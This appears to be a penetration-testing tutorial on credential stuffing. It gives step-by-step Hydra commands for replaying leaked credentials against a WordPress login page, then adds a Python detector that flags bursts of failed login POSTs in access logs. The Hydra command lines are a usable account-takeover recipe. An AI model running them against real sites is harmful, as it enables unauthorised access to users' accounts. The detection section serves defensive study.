What is Credential Stuffing?
Credential stuffing is a form of cyber attack in which stolen, leaked, or breached account credentials are replayed in automated web injection attacks to gain unlawful access to user accounts. Such credentials generally consist of a username or email address paired with a password.
The adversary carrying out a credential stuffing attack simply automates logins with previously disclosed credential pairs, using typical automated tools such as THC-Hydra and Sentry MBA.
When a substantial volume of breached credentials is submitted automatically to the targeted websites, the threat actor can hijack an existing account whenever one of the disclosed pairs matches.
The reasons a cyber adversary may engage in credential stuffing range from espionage to financial gain. The credentials may also have been purchased following a data breach.
Credential stuffing attacks are not only perilous to particular sectors such as the financial industry; they remain a viable automated attack for adversaries in general, because many users reuse the same password across many different websites.
According to ZDNet, over 30 billion login attempts using the credential stuffing method were recorded in less than one year, between November 2017 and June 2018.
Note: This is a penetration testing tutorial. You are responsible for your own actions.
How To Launch An Account Takeover Attack With Hydra’s Built-in Credential Stuffing Capability In Kali Linux
In this tutorial, we will attempt to launch an account takeover attack on a fictional WordPress site using Hydra and Kali Linux.
1. To begin, go to the directory where the known credentials are located
For instance, our folder could be located in /home/root/Desktop/Hello. Hello would be the name of the folder.
Hence, type in the following command into the terminal:
cd Desktop/Hello
2. Proceed by typing into the terminal:
ls
The terminal command “ls” refers to List Directory Contents. This will confirm that the credentials are in the folder.
3. Confirm/modify the known credentials (passwords and/or users.txt)
Type the subsequent command into the terminal:
sudo nano passwords.txt
You will see passwords in the file passwords.txt.
Feel free to confirm that these are the credentials or modify accordingly.
Remember to save any changes you’ve made to the file.
If you’ve closed the terminal window after making the changes, Kali Linux will automatically create the file passwords.txt.save in the Hello directory. Simply change the file back to passwords.txt.
4. Enter the known credentials into the terminal
Go ahead and type in one of the subsequent commands into the terminal:
hydra -L usernames.txt -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1
OR
hydra -l admin -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1
Remember to modify the parameters accordingly. Alter the domain with the appropriate extension.
Our example will be a WordPress login page: /wp-login.php
For this tutorial, we will go with one known username: admin
5. Wait For The Brute-force Attack To Finish
The brute-force attack attempts will take some time to complete. How long depends on the number of credential pairs, the thread count, and how quickly the target responds.
6. Account Takeover Attack: Successful Or Not?
If the credential stuffing attack is successful, we will see the password revealed by Hydra which will also match the known username that was entered into the parameter and terminal.
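On the defending side, the attack above leaves a recognisable trace in the web server's access log: a burst of POST requests to /wp-login.php from one source, each answered with a 200 (the login form re-rendered on failure) until one is answered with a 302 redirect, which is exactly the "Location" signal Hydra's S=Location success condition keys on. The following detector, an added example that is not part of the original tutorial, parses constructed access log lines in the standard combined format and flags any IP whose failed login POSTs exceed a threshold inside a sliding window, marking a subsequent success as a likely account takeover. The log lines, IP addresses, thresholds and function names are all assumptions made for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample access log lines (Apache/nginx "combined" format); not real traffic.
# 203.0.113.7 posts to /wp-login.php once a second: five failures (status 200, the
# form is re-rendered) and then one 302, which WordPress returns on a successful login.
# 198.51.100.4 is an ordinary user who logs in on the first try.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2018:12:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2018:12:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2018:12:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2018:12:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2018:12:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2018:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2018:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2018:12:00:06 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_login_abuse(log_text, window_seconds=60, max_failures=4, login_path="/wp-login.php"):
    """Return {ip: finding} for every IP whose failed login POSTs exceed max_failures
    inside a sliding window of window_seconds.

    A POST to the login path answered with 302 is treated as a successful login
    (WordPress redirects on success); any other status is treated as a failure.
    A success that arrives after an IP has already been flagged is recorded as a
    likely account takeover."""
    recent = defaultdict(deque)  # ip -> timestamps of recent failures
    findings = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev or ev["method"] != "POST" or ev["path"] != login_path:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["status"] == 302:
            if ip in findings:
                findings[ip]["success_after_burst"] = True
                findings[ip]["success_at"] = ts.isoformat()
            continue
        q = recent[ip]
        q.append(ts)
        # Drop failures that have fallen out of the sliding window.
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) > max_failures:
            f = findings.setdefault(ip, {
                "failures_in_window": 0,
                "success_after_burst": False,
                "first_seen": q[0].isoformat(),
            })
            f["failures_in_window"] = max(f["failures_in_window"], len(q))
    return findings


if __name__ == "__main__":
    for ip, finding in detect_login_abuse(SAMPLE_LOG).items():
        print(ip, finding)
```

Run against the sample, the detector flags 203.0.113.7 with five failures in the window and a success after the burst, while the legitimate user at 198.51.100.4 produces no finding. Two caveats matter in practice: a real credential stuffing campaign is usually spread across many source IPs with only a handful of attempts each, so a per-IP threshold should be complemented by a site-wide failure rate and distinct-IP count over the same window; and the access log does not carry the submitted username, so distinguishing stuffing (many usernames, one password each) from single-account brute force requires hooking the application's own failed-login event.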